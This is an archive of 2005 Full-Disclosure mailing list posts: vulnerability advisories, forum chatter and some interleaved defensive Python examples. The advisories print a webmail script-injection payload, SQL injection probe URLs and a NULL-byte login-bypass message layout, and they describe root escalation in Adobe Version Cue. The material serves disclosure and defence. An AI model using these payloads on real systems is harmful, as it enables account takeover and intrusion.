[Full-Disclosure] Chung's Donut Shop Release: Hacking Sprint PCS Vision
Hi, my mom has a Sprint PCS phone. It's a Sanyo 8300, and I can't figure out the password, because when you go to sprintpcs.com you put in your phone number, then your password, and I don't know it. I was wondering if you can help me, please.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability
======================================================================

                      Secunia Research 29/08/2005

       - SqWebMail HTML Emails Script Insertion Vulnerability -

======================================================================
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

======================================================================
1) Affected Software

SqWebMail 5.0.4

Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: Script Insertion
Where:  From Remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks.

The vulnerability is caused due to SqWebMail failing to properly sanitise HTML emails. This can be exploited to include arbitrary script code in HTML emails, which will be executed in context of the SqWebMail server, as soon as the user views a received email.

Example:
<img src=cid: onError=alert(document.domain);>

Successful exploitation allows execution of arbitrary script code and makes it possible for a malicious person to perform the same actions as the user of the webmail account (e.g. sending or viewing emails).

======================================================================
4) Solution

The vendor has issued an updated version of SqWebMail, which fixes this vulnerability.
http://www.courier-mta.org/?download.php

======================================================================
5) Time Table

26/08/2005 - Initial vendor notification.
26/08/2005 - Vendor confirms vulnerability and releases a fix.
29/08/2005 - Public disclosure.

======================================================================
6) Credits

Discovered by Jakob Balle, Secunia Research.

======================================================================
7) References

No references available.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-39/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
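The fix class for this bug is an allowlist sanitizer run over the HTML body before it is rendered to the webmail user. The following is an added example (not Secunia's code and not SqWebMail's fix) built on Python's html.parser; the tag and scheme allowlists are assumptions, and the sample message is constructed around the advisory's img payload.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist of tags and, per tag, the attributes that may survive. Anything
# else (unknown tags, unknown attributes, every on* handler) is dropped, so a
# received HTML mail cannot run script in the reader's webmail session.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "u": set(), "em": set(),
    "strong": set(), "ul": set(), "ol": set(), "li": set(), "blockquote": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}                    # element and its text vanish
ALLOWED_SCHEMES = {"http", "https", "mailto", "cid"}  # cid: = inline MIME part


def safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other unlisted scheme."""
    v = value.strip().lower()
    if ":" not in v:
        return True             # relative reference, no scheme at all
    return v.split(":", 1)[0] in ALLOWED_SCHEMES


class EmailSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0           # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        allowed = ALLOWED_TAGS.get(tag)
        if allowed is None or self.skip:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in allowed:
                continue        # event handlers never survive, whatever the tag
            value = value or ""
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))


def sanitize_html_email(html: str) -> str:
    """Return a copy of the message body containing only allowlisted markup."""
    p = EmailSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed sample: the advisory's <img> payload plus two other classic vectors.
SAMPLE_EMAIL = (
    "<p>Invoice attached.</p>"
    "<img src=cid: onError=alert(document.domain);>"
    '<a href="javascript:alert(1)" onclick="x()">open</a>'
    "<script>alert(1)</script>"
)

if __name__ == "__main__":
    print(sanitize_html_email(SAMPLE_EMAIL))
```

The onError handler is stripped while the cid: reference to the inline image part is kept, which is the behaviour a webmail front end needs.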
RE: [Full-disclosure] RE: Example firewall script
I'm looking for bad rule sets to learn a little more. I thought that my question was interesting because there are many people here who know about this. Can you recommend me any web site or any book?

Thanks

-----Original Message-----
From: James Tucker [mailto:[EMAIL PROTECTED]]
Sent: Saturday, 27 August 2005 18:17
To: Full Disclosure
Subject: Re: [Full-disclosure] RE: Example firewall script

> Screw these arguments. What you should really do is get a security consultant to teach you the basics, and provide you with some exposure to the various different options you may have available, and in the case of your request, offer you some of the old horror stories.
>
> If your only aim is to learn, then I would suggest starting with your firewall's documentation. Most firewall developers do have at least a reasonable knowledge of firewall security and rule building. Moreover good documentation will leave references to good physical sources (books, courses, etc.).
>
> Getting back to the original question of BAD configurations :) (yep, my ATD is higher today) you may find some reasonable examples in high quality documentation too. You might try looking into any detailed hacking stories and statistics you can find, as these may lead to some other interesting conclusions about firewalls and their impacts on security too.
>
> Also, forums might be a good place to pick up bad firewall rules, you know those places are filled with crap because people just can't resist trying to show up the next guy and pretend to be the best.
>
> Just out of interest, why are you looking for Bad rule sets?
Re: [Full-disclosure] Really ODD 12 byte UDP attempts
On Sun, 28 Aug 2005 23:44:25 -0400, Michael Hale [EMAIL PROTECTED] wrote:

> I agree - Unix style traceroute probably responsible. See:
> http://www.tech-faq.com/unix-windows-traceroute.shtml
>
> On 8/28/05, Blue Boar [EMAIL PROTECTED] wrote:
>> James Lay wrote:
>>> Aug 28 06:57:01 kernel: New,invalid SRC=64.94.45.26 DST=24.116.255.102 LEN=32 PROTO=UDP SPT=11050 DPT=33440 LEN=12
>>
>> Most likely someone is just tracerouting to your IP. Grab the actual packets, and check the TTLs to be sure.
>>
>> BB

Ya... this is what it was alright, every swinging one has a TTL of 1 or 2. Nice to know that there are so many out there tracerouting me :D

Thanks for the quick and easy answer.

James
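An added detection example, not from the thread, that turns Blue Boar's advice into a log check: it parses netfilter LOG lines like James's and flags the classic Unix traceroute probe (small UDP datagram to destination ports 33434 and up, arriving with a TTL of only a few). The first sample line is the one quoted above; the others are constructed, and the port range and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")
INT_FIELDS = {"SPT", "DPT", "TTL", "ID"}
TRACEROUTE_PORTS = range(33434, 33534)   # traceroute base port plus ~100 probes' worth
MAX_PROBE_UDP_LEN = 64                   # 8-byte UDP header + a small payload
MAX_PROBE_TTL = 3                        # probes that reach the target arrive nearly expired


def parse_iptables_log(line: str) -> dict:
    """Return the KEY=value fields of one LOG line. LEN appears twice (IP total
    length first, UDP length second), so it is collected as a list in order."""
    rec = {"LEN": []}
    for key, val in FIELD_RE.findall(line):
        if key == "LEN":
            rec["LEN"].append(int(val))
        elif key in INT_FIELDS:
            rec[key] = int(val)
        else:
            rec[key] = val
    return rec


def classify(rec: dict) -> str:
    """'traceroute' when port, size and TTL all fit; 'traceroute-unconfirmed'
    when the line carries no TTL (capture the packets to check, as advised
    above); 'other' for everything else."""
    if rec.get("PROTO") != "UDP" or rec.get("DPT") not in TRACEROUTE_PORTS:
        return "other"
    if len(rec["LEN"]) >= 2 and rec["LEN"][-1] > MAX_PROBE_UDP_LEN:
        return "other"
    ttl = rec.get("TTL")
    if ttl is None:
        return "traceroute-unconfirmed"
    return "traceroute" if ttl <= MAX_PROBE_TTL else "other"


def summarize_by_source(lines) -> dict:
    """Count verdicts per source address so a persistent tracerouter stands out."""
    summary = defaultdict(Counter)
    for line in lines:
        rec = parse_iptables_log(line)
        if "SRC" in rec:
            summary[rec["SRC"]][classify(rec)] += 1
    return dict(summary)


# First line: the one quoted in the thread (no TTL field). Remaining lines: constructed.
LOG_LINES = [
    "Aug 28 06:57:01 kernel: New,invalid SRC=64.94.45.26 DST=24.116.255.102 "
    "LEN=32 PROTO=UDP SPT=11050 DPT=33440 LEN=12",
    "Aug 28 06:57:02 kernel: New,invalid IN=eth0 OUT= SRC=64.94.45.26 DST=24.116.255.102 "
    "LEN=32 TOS=0x00 PREC=0x00 TTL=1 ID=4711 PROTO=UDP SPT=11051 DPT=33441 LEN=12",
    "Aug 28 06:57:02 kernel: New,invalid IN=eth0 OUT= SRC=64.94.45.26 DST=24.116.255.102 "
    "LEN=32 TOS=0x00 PREC=0x00 TTL=2 ID=4712 PROTO=UDP SPT=11052 DPT=33442 LEN=12",
    "Aug 28 07:01:10 kernel: New,invalid IN=eth0 OUT= SRC=198.51.100.7 DST=24.116.255.102 "
    "LEN=61 TOS=0x00 PREC=0x00 TTL=54 ID=9 PROTO=UDP SPT=53 DPT=1025 LEN=41",
    "Aug 28 07:02:33 kernel: New,invalid IN=eth0 OUT= SRC=203.0.113.9 DST=24.116.255.102 "
    "LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=1 PROTO=TCP SPT=4413 DPT=445 WINDOW=65535 RES=0x00 SYN URGP=0",
]

if __name__ == "__main__":
    for src, counts in summarize_by_source(LOG_LINES).items():
        print(src, dict(counts))
```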
[Full-disclosure] [SECURITY] [DSA 788-1] New kismet packages fix arbitrary code execution
- --------------------------------------------------------------------------
Debian Security Advisory DSA 788-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
August 29th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kismet
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2626 CAN-2005-2627
CERT advisory  :
BugTraq ID     :
Debian Bug     :

Several security related problems have been discovered in kismet, a wireless 802.11b monitoring tool. The Common Vulnerabilities and Exposures project identifies the following problems:

CAN-2005-2626

    Insecure handling of unprintable characters in the SSID.

CAN-2005-2627

    Multiple integer underflows could allow remote attackers to execute arbitrary code.

The old stable distribution (woody) does not seem to be affected by these problems.

For the stable distribution (sarge) these problems have been fixed in version 2005.04.R1-1sarge1.

For the unstable distribution (sid) these problems have been fixed in version 2005.08.R1-1.

We recommend that you upgrade your kismet package.

Upgrade Instructions
- --------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
Re: [Full-disclosure] Re: JA
I don't know about y'all, but if I was admin of a public ISP (or whatever), I wouldn't want to give anyone the idea that I'm smarter than everyone on the list that's just begging to be hacked/defaced/owned/etc.

exibar

----- Original Message -----
From: Bardus Populus [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, August 29, 2005 1:02 AM
Subject: [Full-disclosure] Re: JA

> [EMAIL PROTECTED], please follow your own rules.
>
> Missouri FreeNet staff and users are both held to the same general rules of conduct, as only a uniform policy of openness and respect can be reasonably expected to further MFN's goal of universal education.
>
> -bp
Re: [Full-disclosure] RE: Example firewall script (iptables)
Maybe you'd get more informative and less 'get a clue!' answers if you rephrased and explained your question a little. For one, what in the world is a firewall script? I'd guess it's firewall rules you're talking about. Second, in what scenario? Corporate firewall, SME, personal, school? Without knowing that, the only answers you can get are that 'pass all' is bad, and so is 'block all'.

// hdw

Bernardo Martín wrote:
> Anybody have more information about bad example firewall script??
>
> -----Original Message-----
> From: Bernardo Martín [mailto:[EMAIL PROTECTED]]
> Sent: Monday, 29 August 2005 14:01
> To: Full Disclosure
> Subject: RE: [Full-disclosure] RE: Example firewall script
>
> I'm looking for bad rule sets to learn a little more. I thought that my question was interesting because there are many people here who know about this. Can you recommend me any web site or any book?
>
> Thanks
>
> -----Original Message-----
> From: James Tucker [mailto:[EMAIL PROTECTED]]
> Sent: Saturday, 27 August 2005 18:17
> To: Full Disclosure
> Subject: Re: [Full-disclosure] RE: Example firewall script
>
>> Screw these arguments. What you should really do is get a security consultant to teach you the basics, and provide you with some exposure to the various different options you may have available, and in the case of your request, offer you some of the old horror stories.
>>
>> If your only aim is to learn, then I would suggest starting with your firewall's documentation. Most firewall developers do have at least a reasonable knowledge of firewall security and rule building. Moreover good documentation will leave references to good physical sources (books, courses, etc.).
>>
>> Getting back to the original question of BAD configurations :) (yep, my ATD is higher today) you may find some reasonable examples in high quality documentation too. You might try looking into any detailed hacking stories and statistics you can find, as these may lead to some other interesting conclusions about firewalls and their impacts on security too.
>>
>> Also, forums might be a good place to pick up bad firewall rules, you know those places are filled with crap because people just can't resist trying to show up the next guy and pretend to be the best.
>>
>> Just out of interest, why are you looking for Bad rule sets?
Re: [Full-disclosure] J. A. Terranson
On Sun, 28 Aug 2005, ghost wrote:

> J.A., give up computers, go play in a sandbox. Did you just admit to threatening to mailbomb someone? lol.

Bzzdt. This dude calls me up and starts asking if I'm going to. Out of the blue - like I said psycho central. My first response was to tell him to GFY and hang up. His persistence brought him his future.

> Look, Alif,

Awww... Bonding. How cute.

> I like you, really I do. All your lame posts attacking people really add to the list's security awareness, you really are elite. I mean, anyone who puts all their backups on a PUBLIC FTP SERVER can't be too bad of a guy, ya know?

Those backups are a hodge podge of stuff from a variety of folks. I have always left that open (provided there is no warez stored). Feel free to join in.

> I know, I know, you're an *Admin*, you taught the FBI, eric is your toy, and you probably thought you closed it in time.

Actually, most of it was moved around over the weekend, but it will be back shortly. Nothing to hide here.

> Does your wife know about your porn problem?

Problem? What's wrong with my taste in pr0n?

> You're almost as bad as that n3td3v idiot.

Now *that's* fightin' words! (chuckles)

> In short, all I'm trying to say is, let's not play the one up game.

There's no one up game being played here. There's some fucking freak who thinks he can call people on their fucking cell phones without picking up a case. It ain't so.

--
Yours,
J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

"I like the idea of belief in drug-prohibition as a religion in that it is a strongly held belief based on grossly insufficient evidence and bolstered by faith born of intuitions flowing from the very beliefs they are intended to support."

don zweig, M.D.
[Full-disclosure] Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities
TITLE:
======
Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities

SEVERITY:
=========
Medium

SOFTWARE:
=========
Land Down Under version 801 and prior
Support Website : http://www.neocrome.net

INFO:
=====
Land Down Under is a multiple portal system which includes many different options like forum, statistics, site map, article menu and many more. The portal is powered by PHP and MySQL.

BUG DESCRIPTION:
================
The portal system is vulnerable to various SQL injection attacks; here are some examples:

http://localhost/ldu/events.php?c='
http://localhost/ldu/events.php?f=incoming&c='
http://localhost/ldu/events.php?c=%27
http://localhost/ldu/events.php?f=incoming&c=%27
http://localhost/ldu/index.php?c='
http://localhost/ldu/index.php?c=%27
http://localhost/ldu/list.php?c='&s=title&w=asc&o=1&p=1
http://localhost/ldu/list.php?c=%27&s=title&w=asc&o=1&p=1

VENDOR STATUS:
==============
The vendor was contacted using the contacts link on the main page. No response received to date.

CREDITS:
========
This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web  : http://www.h4cky0u.org

Greets to all omega-team members

ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2371

--
http://www.h4cky0u.org
(In)Security at its best...
Re: [Full-disclosure] J. A. Terranson
I think the real issue here is that the rest of us really don't care. If you have a problem with someone, great. But telling us about it doesn't make you any more important in our eyes. In fact, everyone involved in this tit-for-tat is coming off looking very unprofessional.

On 8/29/05, J.A. Terranson [EMAIL PROTECTED] wrote:
> On Sun, 28 Aug 2005, ghost wrote:
>
>> J.A., give up computers, go play in a sandbox. Did you just admit to threatening to mailbomb someone? lol.
>
> Bzzdt. This dude calls me up and starts asking if I'm going to. Out of the blue - like I said psycho central. My first response was to tell him to GFY and hang up. His persistence brought him his future.
[Full-disclosure] Multiple vulnerabilities in BFCommand Control for Battlefield 1942 and Vietnam
#######################################################################

                             Luigi Auriemma

Application:  BFCommand Control Server Manager
              http://www.bfcommandcontrol.org
Versions:     BFCC  <= 1.22_A
              BFVCC <= 2.14_B
              BFVCCDaemon is NOT vulnerable
Platforms:    Windows
Bugs:         A] full anonymous login bypass
              B] login bypass through NULL username
              C] invulnerable clients and full privileges
              D] server full after consecutive connections
Exploitation: remote
Date:         29 Aug 2005
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

BFCommand Control Server Manager is a server manager available for the games Battlefield 1942 (with the name BFCC), Battlefield Vietnam (BFVCC) and Battlefield 2 (BF2CC). The difference between these server managers and the others available on the Internet is that BFVCC is also directly included on the CD of Battlefield Vietnam, so it's used on many servers.

I have made a quick search on the Internet and I have found that over 20% of public Battlefield Vietnam servers use one of the vulnerable versions of BFVCC on standard ports which, through these vulnerabilities, means full access to the management of these game servers and to other possible sensitive information like the POP3 password of the admin.

BFVCCDaemon is not vulnerable because it uses another protocol and in fact is considered a different program altogether. Then, on the Internet, the amount of BFV servers which use BFVCCDaemon is almost nonexistent.

#######################################################################

=======
2) Bugs
=======

------------------------------
A] full anonymous login bypass
------------------------------

This bug can be explained with the following words: a login mechanism does not exist. In fact the login command is totally useless because anyone can connect to the server manager and take control of it with full Super Admin privileges.

The most interesting thing is that without logging into the server the attacker doesn't exist: the logs don't report his operations (except for a couple of commands if used) and for the server there are no people connected at that moment. Really a good way of controlling the server like a ghost, with maximum relaxation and power.

-------------------------------------
B] login bypass through NULL username
-------------------------------------

The login command naturally is composed of a username and a password, but the cool thing is that a NULL byte (0x00) in the username field will bypass the authentication and the server will grant access to the attacker:

  login \x1e           // command
  \0\x1e               // username (NULL byte)
  none \x1e            // password
  none \x1e            // username
  \x1e                 // ???
                       // ???
  \x00\x40\x40\x00     // command delimiter

-------------------------------------------
C] invulnerable clients and full privileges
-------------------------------------------

The admins (and moreover the local admin) have the ability to boot the other remote admins. The command Boot and any other command which has effect on the clients are totally useless since the server continues to keep the connection established, and any operation or disconnection is made by the client, not the server. In short, a modified client (for example placing a NULL byte where the unicode command Boot is located in the executable) cannot be booted.

Then, each admin can be limited in what he can or cannot do by setting some permissions in the User Profiles section. Just as for the Boot command, the permissions are client-side too, so an admin with very restricted power can take full control of the server manager.

--------------------------------------------
D] server full after consecutive connections
--------------------------------------------

A sort of fake players attack, with the difference that here after 20 consecutive connections (just a simple connect and disconnect) the server becomes full forever. In short, if the client doesn't send the login command the server considers the connection in an idle state, and when the limit of 20 connections is reached (although the connections and the sockets have been closed!) it becomes full and nobody can use the server manager remotely. Naturally this attack is not shown in the logs either.

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/bfccown.zip

#######################################################################

======
4) Fix
======

No fix. No
Re: [Full-Disclosure] Chung's Donut Shop Release: Hacking Sprint PCS Vision
On Sun, 28 Aug 2005 21:25:18 PDT, ara rhea said:

> Hi, my mom has a Sprint PCS phone. It's a Sanyo 8300, and I can't figure out the password, because when you go to sprintpcs.com you put in your phone number, then your password, and I don't know it. I was wondering if you can help me, please.

There's probably somebody on this list who can tell you what the password is.

The more interesting question is what your mom is going to do if/when she finds out you hacked her phone. That's a really uncool scene, especially if you're still living at home - do you *really* want her referring to you as "you ungrateful little twerp" (or worse) until you're old enough to move out?
Re: [Full-disclosure] J. A. Terranson
I agree. Please stop. Perhaps we could have a count of the 'ayes' to determine whether the list members wish to participate in the drama.

> I think the real issue here is that the rest of us really don't care. If you have a problem with someone, great. But telling us about it doesn't make you any more important in our eyes. In fact, everyone involved in this tit-for-tat is coming off looking very unprofessional.
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability
Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability

iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=296&type=vulnerabilities
August 29, 2005

I. BACKGROUND

Adobe Version Cue is a software version tracking system for Adobe products distributed with Adobe Creative Suite and select Adobe products.

II. DESCRIPTION

Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges.

Version Cue includes a setuid root application named VCNative which contains a design error that allows local attackers to gain root privileges. The vulnerability specifically exists due to an unchecked command line option parameter. The -lib command line option allows users to specify library bundles, which allows for the introduction of arbitrary code in the context of a root owned process. The init function in a shared library is executed immediately upon loading. By utilizing the -lib argument to load a malicious library, local attackers can execute arbitrary code with root privileges.

III. ANALYSIS

Successful exploitation allows local attackers to execute arbitrary code with root privileges. The attack method is trivial and requires no specialized exploit code or skill by the attacker. Simply compiling a shared library with malicious code is all that is required to gain control of the system.

It should be noted that VCNative must connect to a valid host before loading libraries. The vulnerability is not exposed if VCNative has not been configured with a proper host value. In addition, the vulnerability affects only the Apple OS X platform and is only installed with Adobe Creative Suite or other Adobe products.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in Adobe Version Cue version 1 on the Apple OS X platform.

V. WORKAROUND

As a workaround solution, remove the setuid bit from the VCNative binary and execute the application as a root user when necessary.

VI. VENDOR RESPONSE

Adobe Version Cue Update 2, which addresses this vulnerability, is available for download at:

http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

The vendor advisory for this vulnerability is located at:

http://www.adobe.com/support/techdocs/327129.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1843 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/27/2005 Initial vendor notification
06/27/2005 Initial vendor response
08/29/2005 Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability
Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability

iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=297&type=vulnerabilities
August 29, 2005

I. BACKGROUND

Adobe Version Cue is a software version tracking system for Adobe products distributed with Adobe Creative Suite and select Adobe products.

II. DESCRIPTION

Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges.

Version Cue includes a setuid root application named VCNative which is vulnerable to a symlink attack. The vulnerability specifically exists due to the use of predictable log file names. VCNative uses a format such as VCNative-[pid].log for the filename and stores the file in the current working directory. Attackers can easily predict the created filename and supply user-controlled data via the -host and -port options. A carefully supplied value can cause a crafted log file to be written. Crafted strings written to root-owned files can lead to arbitrary code execution with root privileges.

III. ANALYSIS

Successful exploitation allows local attackers to write to arbitrary files with user-supplied data. Data written to the linked file will include some corrupted data as well as user-supplied data, potentially corrupting a file completely and preventing the execution of system commands. In addition, a carefully crafted input value can be used in conjunction with standard system tools such as cron to gain root privileges.

A workaround solution has been provided for this vulnerability. In addition, the vulnerability affects only the Apple OS X platform and is only installed with Adobe Creative Suite or other Adobe products.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in Adobe Version Cue version 1 on the Apple OS X platform.

V. WORKAROUND

As a workaround solution, remove the setuid bit from the VCNative binary and execute the application as a root user when necessary.

VI. VENDOR RESPONSE

Adobe Version Cue Update 2, which addresses this vulnerability, is available for download at:

http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

The vendor advisory for this vulnerability is located at:

http://www.adobe.com/support/techdocs/327129.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1842 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/27/2005 Initial vendor notification
06/27/2005 Initial vendor response
08/29/2005 Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
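The root cause above is a privileged process opening a guessable log name (VCNative-[pid].log) in a directory someone else can write to. The added example below, not Adobe's code and not iDEFENSE's, contrasts that naive open with a create-only open (O_CREAT|O_EXCL|O_NOFOLLOW, private mode) in a scratch directory where a symlink has been planted at the predictable name; the helper names are hypothetical.

```python
import errno
import os
import tempfile


def predictable_log_path(directory: str, pid: int) -> str:
    """The guessable name the advisory describes: VCNative-[pid].log."""
    return os.path.join(directory, f"VCNative-{pid}.log")


def naive_write_log(directory: str, pid: int, message: str) -> None:
    """Unsafe pattern: a plain append-open follows whatever sits at the name,
    so a symlink planted there redirects the write into its target."""
    with open(predictable_log_path(directory, pid), "a") as fh:
        fh.write(message)


def hardened_open_log(directory: str, pid: int):
    """Create-only open. O_EXCL fails if the name already exists (a symlink
    counts as existing), O_NOFOLLOW refuses to traverse a symlink at the final
    component, and mode 0o600 keeps the file private. Raises OSError
    (EEXIST or ELOOP) instead of writing through a planted link."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(predictable_log_path(directory, pid), flags, 0o600)
    return os.fdopen(fd, "w")


def run_demo(pid: int = 4242):
    """Constructed scenario: in a fresh scratch directory, plant a symlink at
    the predictable log name pointing at a 'protected' file, then exercise both
    implementations. Returns (protected_file_contents, hardened_open_refused)."""
    workdir = tempfile.mkdtemp(prefix="vcnative-demo-")
    protected = os.path.join(workdir, "protected.txt")
    with open(protected, "w") as fh:
        fh.write("original\n")
    os.symlink(protected, predictable_log_path(workdir, pid))

    naive_write_log(workdir, pid, "crafted line\n")   # lands in protected.txt
    with open(protected) as fh:
        contents = fh.read()

    try:
        with hardened_open_log(workdir, pid) as fh:
            fh.write("never written\n")
        refused = False
    except OSError as exc:
        refused = exc.errno in (errno.EEXIST, errno.ELOOP)
    return contents, refused


if __name__ == "__main__":
    print(run_demo())   # ('original\ncrafted line\n', True)
```

The exclusive open is the minimum; the safer design is to log only into a root-owned directory nobody else can write to, rather than the caller's working directory.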
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability
Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability

iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=298&type=vulnerabilities
August 29, 2005

I. BACKGROUND

Symantec AntiVirus 9 Corporate Edition is an enterprise quality Anti-Virus solution for the Windows platform. More information can be found at the following location:

http://enterprisesecurity.symantec.com/products/products.cfm?ProductID=155

II. DESCRIPTION

Local exploitation of a design error in the Symantec AntiVirus 9 Corporate Edition may allow a user to gain elevated privileges.

Exploitation can occur when a user chooses the right click "Scan for viruses" option. The Symantec scan file interface allows the user to launch a help window through the use of a toolbar icon. If the user then right clicks the help window title bar they can choose the "Jump to URL" menu option, which will then allow them to browse the local file system and execute files as the SYSTEM user.

This vulnerability is a re-appearance of an old bug formerly found in the Symantec 7.x series virus scan product.

http://cert.uni-stuttgart.de/archive/bugtraq/2002/10/msg00357.html
http://cert.uni-stuttgart.de/archive/bugtraq/2002/10/msg00379.html

III. ANALYSIS

Successful exploitation allows a local attacker to execute arbitrary commands as the System Administrator user.

IV. DETECTION

iDEFENSE has confirmed this vulnerability exists in version 9.0.1.1000 of Norton Antivirus Corporate Edition for Windows with all current updates applied. This is a re-appearance of an old bug that was reportedly fixed in versions 7.5.1 Build 62 and later, and version 7.6.1 Build 35a.

V. WORKAROUND

iDEFENSE is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Symantec engineers have verified this issue and corrected it in Maintenance Release (MR) 3 and all subsequent MRs and upgrades for Symantec AntiVirus Corporate Edition and Symantec Client Security.

A vendor advisory for this issue is available at the following URL:

http://www.symantec.com/avcenter/security/Content/2005.08.24.html

